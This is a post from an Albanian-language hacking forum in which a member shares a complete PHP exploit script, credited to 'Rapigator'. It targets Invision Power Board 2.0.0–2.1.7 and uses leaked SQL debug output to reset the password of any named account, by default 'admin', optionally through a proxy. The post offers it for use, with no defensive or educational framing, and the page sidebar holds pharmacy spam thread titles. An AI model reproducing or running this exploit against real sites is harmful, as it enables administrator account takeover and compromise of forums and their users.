Tnn-crew
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Tani Do te Vazhdojme edhe me tej Me forume te reja
 
ForumPortaliGalleryLatest imagesKërkoRegjistrohuidentifikimi
< class="" height="25"> Kërko
 


 Display results as :
 
Rechercher Advanced Search
< class="" height="25"> Tema Fundit
» Viagra Generico. viagra generico affitto on line
hacking ::original : Icon_minitimeThu Aug 04, 2011 4:21 pm nga

» Comprare Viagra. viagra generico differenze
hacking ::original : Icon_minitimeThu Aug 04, 2011 5:04 am nga

» Acquistare Viagra. viagra generico in italia cialis levitra
hacking ::original : Icon_minitimeThu Aug 04, 2011 5:00 am nga

» Viagra Precio. viagra en andorra sin receta
hacking ::original : Icon_minitimeFri Jul 29, 2011 6:39 pm nga

» Viagra Sin Receta. farmacia andorra viagra
hacking ::original : Icon_minitimeFri Jul 29, 2011 7:22 am nga

» Viagra Sin Receta. se puede comprar viagra en farmacias sin receta
hacking ::original : Icon_minitimeThu Jul 28, 2011 10:31 am nga

» Viagra Sin Receta. compra viagra sin receta
hacking ::original : Icon_minitimeThu Jul 28, 2011 6:46 am nga

» программы для компьютра
hacking ::original : Icon_minitimeWed Jul 27, 2011 5:23 am nga

» The third default in America?
hacking ::original : Icon_minitimeTue Jul 26, 2011 8:55 pm nga

< class="" height="25"> Marketing
hacking ::original : F.0416022159795_mhacking ::original : Rtklogo
< class="" height="25">
hacking ::original : GoldSponsor
< class="" height="25"> Forum
Lajmerim Lajmerojme e kush i preferon 5 persona per ne forumin tone do te kete nje forum falas me prapashtesen (.tk) shpejt shpejt shpejt kjo oferte vlen deri me 1 mars
< class="" height="25"> Affiliates
free forum

< class="" height="25">
Navigacion
 Portali
 Indeksi
 Lista e Anëtarëve
 Profili
 Pytësori
 Kërko

 

hacking ::original :

Shiko temën e mëparshme Shiko temën pasuese Shko poshtë 
Autori Mesazh
ilir
I pavarur
ilir


Age : Registration date : 03/12/2008 Numri i postimeve : 18 Vendodhja :

hacking ::original : Vide
MesazhTitulli: hacking ::original :   hacking ::original : Icon_minitimeMon Dec 08, 2008 12:31 pm

--------------------------------------------------------------------------------

Shikoni kete exploit e gjeta hte eshte per Hack Phbb

Kodet PHP:
<?php
// -----------------------------
//Debug Mode password change vulnerability
//Affects Invision Power Borard 2.0.0 to 2.1.7
//by Rapigator

//This works if:

//"Debug Level" is set to 3
//or
//Enable SQL Debug Mode is turned on

//In General Configuration of the forum software.


// The forum's address up to and including 'index.php'
$site = "http://localhost/forums/index.php";

// An existing user's login name
$name = "admin";

// The new password(3-32 characters)
$pass = "1234";

// You can use a proxy...
// $proxy = "1.2.3.4:8080";



// -----------------------------
$site .= "?";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
} else {
$suffix = "&debug=1";
$curl = curl_init($site.'act=Reg&CODE=10'.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
}
}
if (!isset($regid) || !isset($regcode)) {
echo "Error: Probably not vulnerable, or no forum found";
exit;
}

$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$r egid }&reg_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}

function change_pass($regcode,$regid,$vid,$userid) {
global $site, $proxy, $name, $pass;
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&a id={ $vid}&regid={$regid}&reg_code={$regcode}&pass1={$p ass}&pass2={$pass}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
echo "Password Changed!";
exit;
}
?>
Mbrapsht në krye Shko poshtë
Administrator
Fillestar
Administrator


Age : 33 Registration date : 02/12/2008 Numri i postimeve : 41 Vendodhja : Prizren

hacking ::original : Vide
MesazhTitulli: Kerkes   hacking ::original : Icon_minitimeMon Dec 15, 2008 10:35 pm

Mund te beni kerkes per programe
Mbrapsht në krye Shko poshtë
http://tnn-crew.tk

hacking ::original :

Shiko temën e mëparshme Shiko temën pasuese Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit: Ju nuk mund ti përgjigjeni temave të këtij forumi
Tnn-crew :: Hacking -